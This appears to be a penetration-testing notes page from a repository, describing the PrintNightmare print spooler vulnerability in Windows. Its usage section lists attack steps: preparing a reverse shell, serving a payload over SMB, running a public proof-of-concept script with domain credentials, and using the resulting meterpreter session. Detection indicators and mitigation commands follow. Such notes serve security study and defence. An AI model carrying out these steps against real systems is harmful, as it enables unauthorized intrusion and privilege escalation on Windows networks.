whx
/
killchain-compendium
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity
killchain-compendium/exploit/windows/print_nightmare/print_nightmare.md

1.5 KiB
Raw Blame History

Print Nightmare

  • Privilege Escalation using Print Spooler Service
  • Located at C:\Windows\System32\spoolsv.exe
  • Enabled by default
  • CVE-2021-1675 (locally exploitable) and CVE-2021-34527 (RCE) are both related to the print spooler
  • RCE connection is done via DCE/RPC. Use of RpcAddPrinterDriver or RpcAddPrinterDriverEx

Usage

  • Prepare reverse shell
  • Check if target would be vulnerable
rpcdump.py @$TARGET_IP | grep -e 'MS-RPRN|MS-PAR'
  • Execute smb server
smbserver.py share . -smb2support
  • Execute PoC with credentials to elevate
python CVE-2021-1675.py <domain of domaincontroller>/<user>:<password>@$TARGET_IP
  • Use the meterpreter session

IOCs

  • pcAddPrinterDriverEx() is called

  • Sygnia explains them

  • Splunk queries

  • Logs are Microsoft-Windows-PrintService/Admin and Microsoft-Windows-PrintService/Operational

  • Event Ids 316, 808, 811, 31017, 7031

Mitigation

  • link
  • Stop and disable
Stop-Service -Name Spooler -Force
Set-Service -Name Spooler -StartupType Disabled
  • Disable group policy
Computer Configuration/Administrative Templates/Printers